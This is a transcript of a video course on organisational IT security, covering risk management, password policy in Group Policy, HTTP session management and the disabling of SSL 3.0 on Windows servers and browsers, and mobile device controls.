configure and implement file encryption to protect data at rest; and how to configure encryption and session
management settings.
Table of Contents
Objectives
No Objective Provided
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical trainer with global
knowledge. A programmer, consultant as well as an IT tech author and editor from McGraw-Hill and Wiley
Publishing. He has held and still holds IT certifications in Linux, Novell, Lotus, CompTIA and Microsoft.
His specialties over the years have included networking, IT security, cloud solutions, Linux management and
configuration and troubleshooting across a wide array of Microsoft products. Most end users have a general
sense of IT security concepts, but today's IT systems are growing ever larger and more complex.
So now more than ever, it's imperative to have a clear understanding of what digital assets are and how to deal
with security threats and vulnerabilities. Users need to acquire the skills and knowledge to apply security
mitigations at the organizational level. In this course, Dan Lachance will explore how a structured approach to
security allows for the efficient management of security controls. Specifically, he'll cover risk management,
user and session management, and encryption.
Objectives
recognize digital assets that have value to the organization along with related threats
[Video description begins] Topic title: Asset, Threats, and Vulnerabilities. The presenter is Dan
Lachance. [Video description ends]
Today's IT systems are growing ever larger and more complex. And so it's important to protect digital assets.
IT security or cybersecurity is really based on the protection of assets. We want to protect against threats that
might render IT systems unusable. We want to protect against the theft of intellectual property or the theft of
Personally Identifiable Information (PII), which includes things like credit card numbers, street addresses,
mother's maiden name. We want to protect against the theft of Protected Health Information, PHI, which as the
term implies, is medically related information, medical insurance coverage, medical procedures performed,
and so on.
Digital assets have a perceived value to the organization. And it's critical that an up-to-date inventory of these
digital assets is maintained by the organization. Because what might not have value what one point in time
could have great value down the road at a different point in time. Digital assets can include things like IT
systems, unique IT processes, programming code, and of course, data. This data, again might not have a
perceived value immediately, but could down the road, such as gathering user's shopping habits, for example,
might not have a lot of value initially in the first quarter that it's gathered.
But after a few years, we start to be able to perform a trend analysis to see what consumer shopping habits
really turn out to be. And so they can have value down the road, where it might not right now. IT
vulnerabilities are weaknesses, and often they are based on user error. User awareness and training is a great
defense against many security breaches, especially against social engineering or deceptive practices by
malicious users where they're trying to trick users into clicking a link or supplying sensitive information over
the phone, or opening a file attachment in an email.
We also have to consider vulnerabilities related to products that get shipped with default settings that aren't
secure. Things like home wireless routers are a great example where the default username and password might
be in place. And unless the user changes it, it's still in effect even when it's plugged in a user's home. And as a
result, it doesn't take very much to determine what the default credentials are to hack into that type of a system.
With today's proliferation of Internet of Things or IoT devices, which essentially includes pretty much
anything that can connect to the Internet, such as home automation systems, baby monitor, smart cards, and so
on.
The problem with a lot of these is that they're designed to be simple to use, and as a result, don't have a lot of
security built in. And in some cases, the firmware within these IoT devices isn't even updateable. Other
vulnerabilities can come in the form of configuration flaws. An example of this could be hosts or entire
networks that aren't hardened. Hardening means we're reducing the attack surface. In other words, we're trying
to lock down a system or a network environment, perhaps by patching it, by removing unnecessary services,
maybe by putting it on a protected network, and so on.
Examples of IT threats would include Denial of Service or DoS attacks, and its counterpart, Distributed Denial
of Service, or DDoS attacks, which includes a number of machines. It could be dozens, hundreds, or even
thousands under centralized control of a malicious user. The malicious user can then send instructions to that
collection of machines under his or her control, which is called a zombie net or a botnet. And then those bots,
or zombies can then go out and perhaps, flood a victim network with useless traffic.
And therefore, it's Denial of Service for legitimate users of that service. Other threats, of course include
malware whether it's things like spyware or worms. There is a lot of cases of ransomware over the last few
years that might encrypt, sensitive data files. And if you don't provide in a Bitcoin payment, you won't receive
a decryption key. And often, there is no guarantee that you will receive the key anyway even if you do submit
this Bitcoin untraceable payment.
Other IT threats include data loss, whether it's intentional or unintentional, such as a user mistakenly sending a
sensitive email file attachment to people outside of the company. Then we have security controls that are put in
place to mitigate threats, but then over time, might not be as secure as they were initially. Now, examples of
security controls that can mitigate threats would include the encryption of data at rest using an encryption
solution, such as those built into operating systems like Microsoft BitLocker or Microsoft Encrypting File
System.
[Video description begins] Topic title: Risk Management. The presenter is Dan Lachance. [Video description
ends]
Risk management is an important part of cybersecurity. It relates to the protection of digital assets like IT
systems, and the data that they produce and process. Any business endeavor will always have some kind of
potential threats. The key is to properly manage the risk against those digital assets. So, we have to have
acceptable security controls in place to protect assets, at a reasonable cost. Risk management first begins with
the identification of both on-premises and cloud assets. This would include things like personnel. Nothing is
more important than people.
Followed by things like business processes that might be unique within the industry. IT systems and data. We
also have to consider data privacy laws and regulations that might need to be complied with, in the protection
of these IT systems and data. Next we need to identify threats against the assets. So threats against personnel
safety, or data theft, or systems being brought down. So that would result in system down time which certainly
has a cost associated with it. We then need to determine the likelihood that these threats would actually occur,
so we need to prioritize the threats.
This way, we are focusing our energy and our resources on what is most likely to happen, which makes sense.
So what are some examples of potential threats? Well, any threat that is going to have a negative business
impact, such as an e-commerce web site being down for a number of hours. Which means that we can't sell our
products or services if that site is down. When we say that site, we're normally referring to a farm of servers
sitting behind a load balancer in most cases. We might also experience a power outage. That is also another
type of threat, or a hardware failure.
There could be a software failure within the operating system. Or a driver within the operating system can
cause a failure or a malfunction of some kind. Of course, we also have to consider malware infections as a
realistic threat. Or the system being compromised by a malicious user, which then means they could steal data.
Or they might use it for Bitcoin mining, which would slow down our system. Of course, there are always
natural disasters, like floods or fires or bad weather that can cause problems and result in downtime. Of course,
there are then man-made disasters such as arson, fires set on purpose, or terrorist attacks or anything of that
nature.
So the next thing is to prioritize the risks and categorize them via a risk registry. Which is essentially a
centralized document that will show all of the risks, and how they are categorized or prioritized. So we might
determine then that software failure is the most likely threat, followed by hardware failure, maybe followed by
power outages, malware infections, natural disasters, and finally man-made disasters. This could be based on
regional history where our premises are located, as well as past incidents that might have occurred in our
environment.
The next thing to consider is to implement cost-effective security controls. A security control is put in place to
reduce the impact of a threat. And we have to make sure that the risk is accepted in order for this to happen in
the first place. If we choose not to engage in a specific activity because it's too risky, well then, if we're not
engaging in that activity, there is no need to implement a security control. We always have to think about legal
and regulatory compliance regarding security controls.
For example, if we're in the retail business dealing with credit cards and debit cards, then the PCI DSS
standard, which affects merchants dealing with card holder data. We would have to take a look at how we
would protect assets such as customer card information, whether we encrypt network traffic or encrypt data at
rest. And often a lot of these standards will state that data must be protected, but won't specify exactly what
should be used to do it.
Often, that is left up to the implementers. It's important to always monitor the effectiveness of implemented
security controls via periodic security control reviews. Just like digital assets over time can increase in value,
in the same way our implemented security controls can be reduced in terms of their effectiveness at mitigating
a threat. So it's always important to monitor these things over time.
Objectives
[Video description begins] Topic title: Map Risks to Risk Treatments. The presenter is Dan Lachance. [Video
description ends]
Securing IT resources means proper risk management. Proper risk management means mapping risks to risk
treatments. Risk treatments include things like risk acceptance, risk avoidance, risk transfer, and risk
mitigation. We're going to talk about each of these. We're going to start with risk acceptance. With risk
acceptance, we are not implementing any type of specific security control to mitigate the risk. Because, the
likelihood or the realization of that threat is so low that it doesn't require it. And should that threat materialize,
the negative impact to the business might also be very low.
And so we accept the risk as it is in engaging in that particular activity. Some potential examples of this
include the hiring of new employees. Now performing our due diligence with background checks before hiring
might be considered a separate activity than the actual hiring of itself. Which is why hiring new employees
might not require any types of security controls. Company mergers and acquisitions can also fall under this
umbrella. Under the presumption that organizations have already done their due diligence to manage risk
appropriately in their own environments. Using software that is known to have unpatched vulnerabilities, yet
we still choose to use that software in an unpatched state.
Well, we might do that because the possibility of that threat being realized is so low. Risk avoidance is related
to risks that introduce way too high of a possibility of occurrence beyond the organization's appetite for risk.
So what we're doing with risk avoidance then is we are removing the risk, because we are not engaging in the
activity that introduces that high level of risk. As an example, we might stop using a currently deployed
operating system, such as Windows XP, because there are too many vulnerabilities now. Maybe there weren't
initially, but there are now.
And so we're going to upgrade to a newer secure version. Now, in one aspect, we are avoiding the risk because
we are no longer using Windows XP. But at the same time, you could argue that we might be mitigating the
risk by upgrading to a new version of Windows, such as Windows 10. So it really depends on your
perspective. Risk transfer essentially means that we are outsourcing responsibility to a third party. Like an
example of this, these days it's cyber liability insurance related to security breaches, where the monthly
premiums can actually be reduced if you can demonstrate that you've got deployed security controls that are
effective in mitigating risks.
It can relate to online financial transactions, customer data storage, medical patient data storage. Also, if we
decide to outsource some on-premises IT solutions to the public cloud, to a degree, there is risk transfer.
Because we have service level agreements or SLA contracts with cloud providers that guarantee specific levels
of uptime for the use of some different cloud services. Bear in mind that the variety of cloud services available
out there is large and each one of them has a different SLA or service level agreement.
Risk mitigation means that we are applying a security control to reduce the impact if the risk is realized. An
example of this would be firewall rules that block all incoming connections initiated from the Internet. And
this might be required by organizational security policies, by laws, and by regulations. So it's important, then,
that we apply the appropriate risk treatment, given that we have an understanding of the risk associated with
engaging in specific activities.
Objectives
User account management is a crucial part of cybersecurity. It's important that it should be done correctly
because if user accounts are not managed correctly, if they're not secured properly, malicious users could gain
access to user accounts, which could ultimately lead to the compromise of a sensitive system and its data.
User accounts can be managed manually. Usually this is in the form of a GUI, a graphical user interface where
administrators can click and drag and work with user accounts. You might imagine doing this in a Microsoft
Active Directory environment using the Microsoft Active Directory Users and Computers GUI tool. But user
account management can also be automated. For example, technicians might build a Microsoft PowerShell
script to check for users that haven't logged on for more than 90 days. Or, in a UNIX or Linux environment, a
Shell script might be written.
Looking for user accounts that have read and write permissions to the file system. We can also have
centralized management solutions in an enterprise that can be used to push out settings related to user
accounts. Especially those related to password strength. It's important that every user have their own unique
user account and that we don't have any shared logins. This way we have accountability when we start auditing
usage. If we audit usage of a shared account and we realize that in the middle of the night, Saturday night,
someone is doing something they shouldn't be doing to a database, we have no way of really knowing who it
is, if that account is a shared account.
So keep unique user accounts in place. Also we want to make sure we adhere to the principle of least privilege.
This is easier said than done because it's very inconvenient as it's usually the case with anything that means
better security. What this means is that we want to grant only the permissions that are required to perform a
task, whether it's to a user, to a group, to a service account. Now this requires more effort because we might
have to give specific privileges to other specific resources for that account, so it takes more time.
But the last thing you want to do for example in a Windows environment is simply add a user to the
administrator's group on a local Windows machine, just to make sure they have rights to do whatever they
need to do. Not a great idea. The next thing would be password settings, which we mentioned could be
managed centrally. Such as through tools like Microsoft Group Policy where we can set a minimum password
length, password expiration dates, whether or not passwords can be reused.
Multifactor authentication is crucial when it comes to user account management, instead of the standard
username and password, which constitute something you know, we know it's two items, that is single factor
authentication. Multifactor authentication uses authentications from different categories like something you
know and something you have. And a great example of this, and it's prevalent out there often, for example
when you sign into a Google account, you'll have to know a username and a password and then Google will
send an authentication code to your smartphone.
And so, you then have to specify that code as well. You have to have that smartphone as well as knowledge of
the username and password to be able to sign in successfully. User account should also have expiry dates when
applicable. An example of this would be hiring co-op students that are finishing their studies and need some
work-term experience. So we might want to set an expiry on those accounts where we know that they have a
limited lifetime. It's important to audit, not only user account usage but also the file system, networks, servers,
access to data such as in databases.
All of this can be tied back to user accounts. But what we want to make sure we do is we want to make sure
that we are selective in which users we choose to audit and which actions for each user. Because otherwise it
could result in audit alert message fatigue, if you're always getting audit messages about someone opening a
file. Maybe that is not relevant. So we need to think carefully about how to configure our auditing as it relates
to users.
Objectives
[Video description begins] Topic title: Deploy User Account Security Settings. The presenter is Dan
Lachance. [Video description ends]
One way to harden user accounts is to configure the appropriate password security settings for those accounts
in accordance with organizational security policies. If you're a Microsoft shop, you might use a Microsoft
Active Directory Domain that computers are joined to so they can pull down central settings from Group
Policy, such as security settings. That is exactly what I'm going to do here in Windows Server 2016.
Let me go over to my Start menu and fire up the Group Policy Management tool. Now this is a tool that can
also be installed on workstations. You don't have to do it on the server, but it will be present automatically on
servers that are configured as Microsoft Active Directory Domain controllers. When I fire up Group Policy, I
get to specify the Group Policy Object or the GPO in which I want to configure the settings.
[Video description begins] The Group Policy Management window opens. The window is divided into three
parts. The first part is the toolbar. The second part is the navigation pane. It contains the Group Policy
Management root node which contains the Forest: fakedomain1.local node, which further contains Domains
and Sites subnodes, Group Policy Modeling and Group Policy Results options. The Domains subnode includes
fakedomain1.local, Admins, and Domain Controllers subnodes. The fakedomain1.local subnode is expanded
and it contains the Default Domain Policy option. The Default Domain Policy option is selected and open in
the third part. It contains four tabs: Scope, Details, Settings, and Delegation. The Scope tab is selected. It is
further divided into three sections. The first section is Links, which contains the Display links in this location
drop-down list box and a table with Location, Enforced, Link Enabled, and Path column headers and one row.
The values fakedomain1.local, No, Yes, and fakedomain1.local are displayed under the Location, Enforced,
Link Enabled, and Path column headers, respectively. The second section is Security Filtering. It includes a
table with Name column header and one row, with the value Authenticated Users. It also includes three
buttons: Add, Remove, and Properties. The third section is WMI Filtering. It contains a drop down list box
and Open button. [Video description ends]
Every Active Directory Domain has what is called a Default Domain Policy.
[Video description begins] He points to the Default Domain Policy option. [Video description ends]
That is a GPO, a Group Policy Object, and notice that hierarchically, it's indented directly under my Active
Directory Domain.
[Video description begins] He points to the fakedomain1.local subnode. [Video description ends]
So therefore, the settings in this Default Domain Policy will apply to all users and computers in the entire
Active Directory Domain by default, unless it's configured otherwise, but that is the default behavior. So if
you're going to configure password settings in Active Directory using Group Policy, you have to configure
them in the Default Domain Policy.
Other GPOs that you might link with specific organizational units that contain users and computers like
Chicago or Boston or LasVegas, while you can configure other settings that can apply to just those hierarchical
levels of AD, Active Directory, password settings won't work.
[Video description begins] He points to these options under the fakedomain1.local subnode. [Video
description ends]
You've got to do it in the Default Domain Policy because, well, that is just the way it is. So I'm going to go
ahead and right-click on the Default Domain Policy and choose Edit. You'll find that the bulk of security
settings are not at the User Configuration level but rather at the Computer Configuration level. So under
Computer Configuration, I'm going to drill down under Policies, and then I'm going to go down under
Windows Settings.
[Video description begins] The Group Policy Management Editor window opens. It is divided into three parts.
The first part is the toolbar. The second part is the navigation pane. It contains the Default Domain Policy
[SRV2016- 1.FAKEDOMAIN1.LOCAL] Policy root node which contains two nodes, Computer Configuration
and User Configuration. The Computer Configuration node contains the Policies and Preferences subnodes.
The User Configuration node contains the Policies and Preferences subnodes. The third part contains two
tabs, Extended and Standard. [Video description ends]
After that opens up, I'll then be able to drill down and see all of the security settings that are configurable.
[Video description begins] The Windows Settings subnode includes the Name Resolution Policy, Deployed
Printers, and Security Settings subnodes. [Video description ends]
So I'll expand Security Settings and we'll see all kinds of great stuff here including Account Policies. So I’ll
drill down under that, and I'm going to click on the Password Policy.
[Video description begins] The Security Settings subnode includes the Account Policies, Local Policies, and
Event Log subnodes. He expands the Account Policies subnode and it contains Password Policy, Account
Lockout Policy, and Kerberos Policy subnodes. He clicks the Password Policy subnode and a table is
displayed in the third part of the window. The table contains two columns and six rows. The column headers
are Policy and Policy Setting. The Policy column header includes the Enforce password history, Minimum
password age, and Minimum password length values. [Video description ends]
Over on the right, I can determine the password settings I want applied at this domain level which will apply to
all the users and computers in the domain by default. Now it might take an hour and a half, two hours, three
hours depending on your environment and how it's set up.
It's not going to be immediate once you configure it, but these settings will be put into effect. So what I'm
going to do here, is start with the Minimum password length, which is currently set at 0 characters, that is
terrible. So I'm going to go ahead and double-click on that, and I'm going to say that it needs to be a minimum
of 16 or 14 characters.
[Video description begins] The Minimum password length Properties dialog box opens. It contains two tabs:
Security Policy Setting and Explain. The Security Policy Setting tab is selected. It includes a Define this policy
setting checkbox and No password required spin box. It also includes OK, Cancel, and Apply buttons. The
Define this policy setting checkbox is selected. [Video description ends]
[Video description begins] He enters the value 14 in the No password required spin box. The name of the spin
box changes from No password required to Password must be at least. [Video description ends]
Now depending on add-on extensions you might have installed, other additional products besides just what you
get with Active Directory, you'll have different settings that you can apply here. So here, I'm going to have to
be happy with 14 character passwords. Your users won't be happy, but that doesn't matter, the environment
will be more secure.
[Video description begins] He clicks the OK button and the Minimum password length Properties dialog box
closes. [Video description ends]
The next thing I can do is turn on password complexity. Now, that is already turned on, which means we
don't want to allow simple passwords to be used.
[Video description begins] He double-clicks the Password must meet complexity requirements value and the
Password must meet complexity requirements Properties dialog box opens. It contains two tabs: Security
Policy Setting and Explain. The Security Policy Setting tab is selected. It contains Define this policy setting
checkbox and two radio buttons, Enabled and Disabled. Define this policy setting checkbox and Enabled radio
button are selected. [Video description ends]
In other words, we want to be able to use a mixture of upper and lowercase letters and symbols and so on.
When you're configuring Group Policy, notice that you'll always have an Explain tab at the top so you can see
what that specific setting will do. And here we see what the password complexity settings entail. So we've got
that setting, that is fine, it was already done.
[Video description begins] He clicks the OK button and the Password must meet complexity requirements
Properties dialog box closes. [Video description ends]
[Video description begins] He double-clicks the Minimum password age value and the Minimum password
age Properties dialog box opens. It includes a Define this policy setting checkbox and Password can be
changed immediately spin box. It also includes OK, Cancel, and Apply buttons. The Define this policy setting
checkbox is selected. [Video description ends]
Because as soon as a user is forced to change a password, I don't want them to go and change it right away to
something else that they know that is easier to use.
[Video description begins] He enters the value 5 in the Password can be changed immediately spin box and
the name of the spin box changes to Password can be changed after:. [Video description ends]
I'm also going to set a Maximum password age in accordance with organizational security policies.
[Video description begins] He clicks the OK button and the Minimum password age Properties dialog box
closes. He double-clicks the Maximum password age value and the Maximum password age Properties dialog
box opens. It includes a Define this policy setting checkbox and Password will not expire spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is selected. [Video
description ends]
[Video description begins] He enters the value 30 in the Password will not expire spin box and the name of the
spin box changes to Password will expire in. He clicks the OK button and the Maximum password age
Properties dialog box closes. [Video description ends]
I can also Enforce password history so people can't keep reusing the same passwords. Maybe it will remember
the last eight passwords.
[Video description begins] He double-clicks the Enforce password history value and the Enforce password
history Properties dialog box opens. It includes a Define this policy setting checkbox and Do not keep
password history spin box. It also includes OK, Cancel, and Apply buttons. The Define this policy setting
checkbox is selected. He enters the value 8 in the Keep password history spin box and the name changes to
Keep password history for:. He clicks the OK button and the dialog box closes. [Video description ends]
So all of these settings are now saved into Group Policy within the Default Domain Policy. So what this means
is as machines refresh Group Policy, which they do automatically by default, approximately every 60 to 90
minutes, then they will see this change, and it will be put into effect.
Objectives
[Video description begins] Topic title: HTTP Session Management. The presenter is Dan Lachance. [Video
description ends]
HTTP stands for HyperText Transfer Protocol. It's the protocol that is used between a web browser and a web
server as they communicate back and forth. The secured version of it is HTTPS, which can use SSL or ideally
TLS, Transport Layer Security, to secure that communication. HTTP/1.0 is considered stateless. What this
means is that, after the web browser makes a request to the web server and the web server services it, the
communication stops, the session isn't retained.
[Video description begins] Communication stops upon HTTP transaction completion. [Video description ends]
And so the way that we get around this is by using web browser cookies. These are small files on the client
web browser machine that can retain information. References for a user for a web site, things like the preferred
language, but also session state information between invocation of HTTP requests. So it might have a session
ID that is encrypted after the user successfully authenticates to a secured web site.
And that would be in the form of a security token, then that cookie data, such as the token, can then be
submitted to web servers for future transactions. Now, there is usually a timeout involved with this, and you
might be familiar with this if you've ever conducted online banking. After you authenticate to online banking,
for a few minutes you can continue doing your online banking without having to reauthenticate. But if you step
away from your station for a few minutes and don't log out, when you come back you'll have to reauthenticate.
So usually this cookie data has a specific lifetime.
HTTP/2 does support what are called persistent HTTP connections. Also they're called HTTP TCP connection
reuse settings or HTTP keep-alive, which is enabled through an HTTP header. All of this really means the
same thing. It means that instead of having a single connection between a web browser and a web server that
terminates after the server services the request, we have the connection that isn't always treated like it's new
every time the web browser sends a request to the server.
So this can also be done programmatically. Developers can use language and platform-specific APIs, so if
they're working in Tomcat Java servlets, for example, where they can enable HTTP session management. So
what we're really doing is taking a bunch of network communications between the browser and the server and
treating it as the same session. So, this can be done using HTTP session IDs, and again, this is what you'll
often see cookies used for, for secured web sites.
So this way, it allows the web server to track sessions from the client across multiple HTTP requests. Because
as we know, generally speaking, certainly in the case of HTTP/1.0, it is considered stateless or connectionless.
So the session ID, where could this be stored? Well, it could actually be stored in a form field on a web form.
It might even be a hidden field. Often it's stored in a cookie. It could also be embedded within a URL, and
when it is, that is called URL rewriting.
HTTP session IDs must not be predictable in order for the use of them to be considered secure. So they
shouldn't be sequential, and they shouldn't be predictable by using some kind of a mathematical formula to
always predict the next value that is going to be used for a session ID. Now, remember that the way session
IDs are used is after a user has successfully authenticated to a site, a web application. In the future during that
session, the client will send the session ID to identify its authenticated state so that the server knows it's
authorized to do things. So the server then can maintain session information for that specific ID. The other
consideration to watch out for is HTTP session hijacking, also called cookie hijacking.
What happens is attackers can take over an established active HTTP session. They need the session ID, which
could be stored under cookie. So imagine that somehow we manage to trick a user into clicking a link on a
malicious web site that executes some JavaScript on the client machine in the web browser. Now, when
JavaScript executes in a web browser, it is limited in terms of what it can do. But one of the things it will be
able to do is to take a look at any cookies and send them along to a server.
So if a user's browser session is compromised and they've already got an authenticated connection, then there
is a possibility that we could have some tampering take place where that session ID could be replayed or sent
out to perform malicious acts. Such as depositing money into an anonymous account or sending it through
Bitcoin over the Internet that the attack would have access to. So as we know, session ID should never be
predictable, otherwise, they are really susceptible to session hijacking. So how could this session hijacking
occur?
We've already identified that it could be client-side malicious web browser scripts that the user is somehow
tricked into executing. Such as, visiting a web site that has some JavaScript on it. It could also be malware that
runs within the operating system. Might not have to be sandboxed to just the web browser session itself.
Another aspect of HTTP session management is to disable SSL, Secure Sockets Layer, on clients and on
servers.
[Video description begins] Disable SSL on Clients and Servers. [Video description ends]
In the screenshot, in the Windows environment, we've got some advanced Internet settings where we have the
option of making sure that SSL or Secure Sockets Layer, is not enabled, which is the case here in the
screenshot.
[Video description begins] A screenshot of Internet Properties dialog box is displayed. It includes the General,
Security, Content, and Advanced tabs. The Advanced tab is selected. It consists of the Settings section and the
Restore advanced settings button. The Settings section includes the Use SSL 3.0, Use TLS 1.0, Use TLS 1.1,
and Use TLS 1.2 checkboxes. The Use TLS 1.0, Use TLS 1.1, and Use TLS 1.2 checkboxes are selected. [Video
description ends]
Even SSL version 3, the last version of SSL, is not considered secure. There are known vulnerabilities, and it's
really a deprecated protocol. So we should be using, where possible, the newest version of TLS, Transport
Layer Security, which supersedes SSL. There are even vulnerabilities with TLS 1.0, so even it shouldn't be
used. But remember, here we're seeing settings on the client side, the service side also needs to be configured
for it. Now, you might wonder, why is there any SSL 3.0 or TLS 1.0 still out there? Backwards compatibility
with older browsers or older software, but ideally, SSL should not be used at all in this day and age.
Objectives
In this demonstration, I'll be configuring SSL and TLS settings. SSL and TLS are protocols that are used to
secure a connection given a PKI certificate. So there is really no such thing as an SSL certificate or a TLS
certificate even though people call it that. It's not specified that we have to use SSL with a given certificate or
TLS. So the same certificate can be used for both or for either. So let's start here on a Microsoft IIS web server.
The first thing I'm going to do on my server is go into the registry editor. So I'm going to start regedit.
[Video description begins] The Registry Editor window opens. It is divided into two parts. The first part is the
navigation pane and the second part is the content pane. The navigation pane contains the Computer root
node which includes HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, and HKEY_LOCAL_MACHINE
nodes. The HKEY_LOCAL_MACHINE node is expanded and it includes HARDWARE, SECURITY, and
SYSTEM subnodes. The SYSTEM subnode is expanded and it includes ActivationBroker and
CurrentControlSet subnodes. The CurrentControlSet subnode is expanded and it includes Control subnode.
The Control subnode is expanded and it includes SecurityProviders subnode. The SecurityProviders subnode
is expanded and it includes SaslProfiles and SCHANNEL subnodes. The SCHANNEL subnode is expanded
and it includes Ciphers and Protocols subnodes. The Protocols subnode is expanded and it contains SSL 2.0
subnode. The SSL 2.0 subnode further contains Client subnode. The second part contains a table with Name,
Type, and Data column headers. [Video description ends]
[Video description begins] He points to the Protocol subnode. [Video description ends]
And that is definitely something that we want to be able to do. SSL 3 has a lot of known vulnerabilities, and as
such, it's considered deprecated. So we really should be disabling it on the server. So to do that, here under
Protocols, I'm going to build some new items. I'm going to right-click on Protocols, choose New > Key and I'm
going to call it SSL 3.0. Under which, I'll then create another key and it's going to be called Server, because
we're configuring the server aspect of it.
[Video description begins] He right-clicks the SSL 3.0 folder and a shortcut menu appears which includes the
New option. He hovers over the New option and a flyout menu appears. It includes Key, String Value and
Binary Value options. [Video description ends]
And then I'm going to configure a DWORD value here under Server, so I'll right-click on that, New >
DWORD (32-bit) Value.
[Video description begins] He selects the Key option. A new folder appears under the SSL 3.0 folder and he
names it Server. [Video description ends]
[Video description begins] He right-clicks the Server folder and a shortcut menu appears. He hovers over the
New option and a flyout menu appears. He clicks the DWORD (32-bit) Value option. A new row appears. The
values REG_DWORD and 0x00000000 (0) appear under the Type and Data column headers. He enters the
value DisabledByDefault under the Name column header. The Edit DWORD (32-bit) Value dialog box opens.
It includes Value name and Value data text boxes. It includes Base section with two radio buttons,
Hexadecimal and Decimal and OK and Cancel buttons. The value DisabledByDefault is displayed in the
Value name text box and the Hexadecimal radio button is selected. [Video description ends]
[Video description begins] He enters the value 1 in the Value data text box and clicks the OK button and the
Edit DWORD (32-bit) Value dialog box closes. The value under the Data column header changes from
0x00000000 (0) to 0x00000001 (1). [Video description ends]
And I'm going to add another item here, I'll build another new DWORD value. This one is going to be called
Enabled and we're going to leave that at a value of 0.
[Video description begins] He right-clicks the Server folder and a shortcut menu appears. He hovers over the
New option and a flyout menu appears. He clicks the DWORD (32-bit) Value option and a new row appears.
The values REG_DWORD and 0x00000000 (0) appear under the Type and Data column headers. He enters
the value Enabled under the Name column header. [Video description ends]
So in other words, SSL 3.0 is not enabled. Now, you want to be careful when you do this type of thing because
depending on what other components need to talk to the web server, like older versions of Microsoft SQL
server, and older web browsers, and what not, they might need to see SSL 3 on the server to function properly.
But at the same time, there are lot of known vulnerabilities. So ideally, it shouldn't be used and you should
upgrade the components that might require SSL 3.
Now, we could do the same thing for enabling TLS, Transport Layer Security, which supersedes SSL by
adding the appropriate keys and values here in the registry, and then of course restarting the server. Then there
is the web browser side, so let's take a peek at that. I'm going to fire up Internet Explorer on this server. And
the first thing I'm going to do is enter http:// and then this hostname. And notice we have access to it, but this is
not an HTTPS or a secured connection, so it's not even trying to use SSL or TLS.
[Video description begins] The host name is srv2016-1.fakedomain1.local/. [Video description ends]
Now, I know that it's configured on my server, so I'm going to change the URL prefix to https. Now we get a
message about the page, page can't be displayed, and then it tells me, we'll take a look at your settings here in
the browser. Okay, I'll do that. I'm going to go ahead and click the settings icon in the upper, right here in
Internet Explorer. I'm going to go down to Internet options. Then I'm going to go to the Advanced tab and kind
of scroll down under the Security section, and notice that we don't have any check marks for SSL 3.
[Video description begins] The Internet Options dialog box opens. It contains seven tabs: General, Security,
Privacy, Content, Connections, Programs, and Advanced. He clicks the Advanced tab. It includes a Settings
section, which includes Use SSL 3.0, Use TLS 1.0, and Use TLS 1.1 checkboxes and Restore advanced settings
button. It also includes the Reset Internet Explorer settings section, which includes a Reset button. [Video
description ends]
Well, that is good. But we also don't have any for TLS. So for example, I should really stay away from TLS
1.0 too. So I´ll turn on the check marks to use TLS 1.1 and 1.2. Again, the only time you might turn on the
other ones is if you absolutely have no choice for backwards compatibility. But I do have a choice here, so I´m
not turning those on. I'm going to click OK and I'm going to refresh this page again.
[Video description begins] The Internet Options dialog box closes. [Video description ends]
So there is a negotiation. There is a handshake when a web browser tries to make a secured connection to some
kind of a secured server, in this case, a web server over HTTPS. And both of the ends of the connection, the
server and the client, have to agree ideally on the highest level of security that is supported. And that is where a
lot of vulnerabilities in the past have kicked in where attackers can force that handshake to lower the security,
to downgrade the security, for example, down to SSL 3 during the negotiation. So they could take advantage of
vulnerabilities. That is not the case here the way we've configured it.
Objectives
explain how centralized mobile device control can secure the environment
[Video description begins] Topic title: Mobile Device Access Control. The presenter is Dan Lachance. [Video
description ends]
These days, mobile device usage is ubiquitous, it is everywhere. Whether you're talking about a laptop, a
tablet, and certainly that is the case with smartphones. Now, the problem with mobile devices, yes, they do
allow people to be productive, even when they're out of the office. However, it can introduce organizational
security risks.
Especially in the case of BYOD, bring your own device, where users can use their personal mobile device like
a laptop or a smartphone, and they can use that against organization's systems. They can do work using their
personal system. The problem with this is that the IT department didn't have a chance to set this up from the
beginning and secure every aspect of it. And that personal device is also going to be connected to home
networks that might not be secured or public Wi-Fi hotspots and so on. And so malware could be introduced to
it which in turn could infect an organization production network when that mobile device connects. So, what
do we do about this?
We can use a mobile device management, or an MDM solution. This is a centralized way for us to manage a
multitude of mobile devices. Such as iOS smartphones, or Android smartphones, or Windows phones, it
doesn't matter. Now, in the case of Microsoft, we can do this to a degree using System Center Configuration
Manager, SCCM. Now, this integrates with Microsoft Intune, which is designed for mobile device
management. So from a central management pane, we can deploy policies that lockdown mobile devices. And
we can also control which apps get installed on the devices and so on.
Another aspect of mobile device access control are captive portals. Now this isn't really specific to mobile
devices but it's a web page that a user needs to interact with prior to getting on the Internet. And I'm sure
you've seen this if you have connected to a public Wi-Fi hotspot, such as in a coffee shop. You might have to
know a password before you're allowed out to the Internet and we're not talking about the Wi-Fi network
connection password. We're talking about after you're on the Wi-Fi network and you fire up a web browser.
You might have to specify credentials or you might only have to agree to acceptable use settings on that
network and then proceed before you get a connection to the Internet.
That is a captive portal. So it may or may not require credentials. The other thing to consider what mobile
devices are PKI certificates. These are security certificates that can be issued to user's devices or software. So
we might have devices like smartphones authenticate to a VPN only if the smartphone has a unique identifier,
a PKI certificate that is trusted by the VPN configuration. That way, even if the user is issued a different
phone, if the device certificate doesn't go along with it or if a new valid one isn't issued, the user will not be
able to get on to the VPN. So it's an additional layer of security. We should also consider network isolation for
mobile devices.
So for example, if we're going to allow bring your own device, BYOD, where employees can use their own
personal smartphones, let's say. We might want to make sure when they're at work that they're on an isolated
network as opposed to being connected directly to a network with sensitive data. We can also enable MAC
address whitelisting prior to allowing access to the network. Whether it's done at the wireless network level or
whether it's done through a wired switch that supports 802.1X authentication. Now, this isn't specific to mobile
devices. The same thing could be done for servers and desktops and any type of device, including IoT devices,
they all have a MAC address.
This is a unique 48-bit hexadecimal hardware address. However, it can easily be spoofed with freely available
tools, just like IP addresses can be spoofed. However, that doesn't mean they shouldn't be a part of our security
strategy, one of the layers where we have multiple layers to enhance security. Also, this might not be scalable
for anonymous guest networks because you're always going to have new devices connecting, you don't already
know their MAC addresses ahead of time. So an example of where MAC address whitelisting would not be
suitable would be at a car dealership where we have a waiting room for customers as their cars are being
repaired or as the paperwork is being drawn up for their purchase of a new vehicle.
